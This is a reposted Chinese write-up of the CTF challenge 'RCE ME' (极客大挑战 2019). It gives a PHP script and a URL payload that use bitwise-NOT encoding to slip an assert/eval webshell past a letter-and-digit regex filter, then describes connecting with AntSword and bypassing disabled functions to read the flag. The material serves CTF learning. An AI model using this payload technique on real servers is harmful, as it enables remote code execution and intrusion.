zoukankan      html  css  js  c++  java
  • [极客大挑战 2019]RCE ME

    这道题目

     直接给出了源码,可以看出一个正则表达式,很明显需要绕过。

    但是它对所有的字母数字进行了匹配。可以通过~来绕过

    给出脚本

    <?php
    error_reporting(0);
    $a='assert';
    $b=urlencode(~$a);
    echo $b;
    echo "<br>";
    $c='(eval($_POST[mochu7]))';
    $d=urlencode(~$c);
    echo $d;
    ?>

     %9E%8C%8C%9A%8D%8B
    %D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%92%90%9C%97%8A%C8%A2%D6%D6

    payload:?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6%D6);

     看到非常多的函数都被禁用了

    用蚁剑连上

    然后学习到一个新方法来绕过禁用函数

    但是我的插件市场打不开,看到网上的师傅是能打开的。

    最后是在终端用readflag来拿到flag的。

    转自:https://my.oschina.net/guizimo/blog/4263599/print

  • 相关阅读:
    搜索框的创建
    自定义非等高 Cell
    自定义等高 Cell
    表格多选删除
    聊天布局
    表格编辑
    表格折叠
    tableView 的协议方法
    UITouch
    UIDevice
  • 原文地址:https://www.cnblogs.com/CNdate/p/13269258.html
Copyright © 2011-2022 走看看